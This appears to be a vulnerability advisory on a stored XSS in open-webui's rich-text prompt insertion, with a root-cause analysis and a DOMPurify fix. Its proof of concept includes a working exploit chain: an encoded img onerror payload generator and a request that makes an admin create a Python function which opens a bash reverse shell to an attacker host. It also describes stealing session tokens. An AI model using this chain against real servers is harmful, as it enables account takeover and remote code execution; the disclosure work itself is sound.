Run the command /poc via a chat window.
<img width="2470" height="1332" alt="image" src="https://github.com/user-attachments/assets/5a112f51-210a-43f3-b999-915b1d0e6744" />
Observe the alert is triggered. <img width="2452" height="1456" alt="image" src="https://github.com/user-attachments/assets/fa15dbd6-44a7-4cfc-bd93-4cc56aac5eea" />
Since admins can naturally run arbitrary Python code on the server via the 'Functions' feature, this XSS could be used to force any admin that triggers it to run one such of these function with Python code of the attackers choosing.
This can be accomplished by making them run the following fetch request:
fetch("https://<HOST>/api/v1/functions/create", {
method: "POST",
credentials: "include",
headers: {
"Content-Type": "application/json",
"Accept": "application/json"
},
body: JSON.stringify({
id: "pentest_cmd_test",
name: "pentest cmd test",
meta: { description: "pentest cmd test" },
content: "import os;os.system('echo RCE')"
})
})
This cannot be done directly because the marked.parse call the HTML is passed through will neutralise payloads containing quotes
<img width="1718" height="482" alt="image" src="https://github.com/user-attachments/assets/6797efbd-4f2e-4570-ad9f-59a65dba1745" />
To get around this strings must be manually constructed from their decimal values using String.fromCodePoint. The following Python script automates generating a viable payload from given JavaScript:
payload2 = """
fetch("https://<HOST>/api/v1/functions/create", {
method: "POST",
credentials: "include",
headers: {
"Content-Type": "application/json",
"Accept": "application/json"
},
body: JSON.stringify({
id: "pentest_cmd_test",
name: "pentest cmd test",
meta: { description: "pentest cmd test" },
content: "import os;os.system('bash -c \\\\'/bin/bash -i >& /dev/tcp/x.x.x.x/443 0>&1\\\\'')"
})
})
""".lstrip().rstrip()
out = ""
for c in payload2:
out += f"String.fromCodePoint({ord(c)})+"
print(f"<img src=x onerror=eval({out[:-1]})>")
An admin that triggers the corresponding payload via a prompt command will trigger a Python function to run that runs a reverse shell payload, giving command line access on the server to the attacker. <img width="2476" height="756" alt="image" src="https://github.com/user-attachments/assets/01f9e991-832a-4cfb-8c3e-3b2ce02cff15" />
Any user running the malicious prompt could have their account compromised via malicious JavaScript that reads their session token from localstorage and exfiltrates it to an attacker controlled server.
Admin users running the malicious prompt risk exposing the backend server to remote code execution (RCE) since malicious JavaScript running via the vulnerability can be used to send requests as the admin user that run malicious Python functions, that may run operating system commands.
Low privilege users cannot create prompts by default, the USER_PERMISSIONS_WORKSPACE_PROMPTS_ACCESS permission is needed, which may be given out via e.g. a custom group. see: https://docs.openwebui.com/features/workspace/prompts/#access-control-and-permissions
A victim user running the command to trigger the prompt needs to have the 'Insert Prompt as Rich Text' setting enabled via preferences for the vulnerability to trigger. The setting is off by default. Users with this setting disabled are unaffected.
Sanitise the user controlled HTML with DOMPurify before assigning it to .innerHtml
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| open-webui | npm | <= 0.6.34 | 0.6.35 |
| open-webui | pip | <= 0.6.34 | 0.6.35 |
The vulnerability exists in the open-webui frontend application, specifically within a Svelte component responsible for handling rich text input. The analysis of the security advisory and the associated patch commit eb9c4c0e358c274aea35f21c2856c0a20051e5f1 confirms the root cause. The function replaceCommandWithText in src/lib/components/common/RichTextInput.svelte takes text from a user-created prompt, converts it to HTML using the marked library, and then prepares it for DOM insertion. The vulnerability is a classic DOM XSS, where untrusted content is passed to an innerHTML sink without proper sanitization. The marked library explicitly states it does not sanitize HTML, which is the core of the issue. An attacker with permissions to create prompts can store a malicious JavaScript payload. When a victim user, with the 'Insert Prompt as Rich Text' feature enabled, uses that prompt, the replaceCommandWithText function is called, and the payload executes. The patch confirms this by introducing DOMPurify.sanitize to clean the HTML generated by marked before it can be rendered, thus neutralizing the XSS threat.
replaceCommandWithTextsrc/lib/components/common/RichTextInput.svelte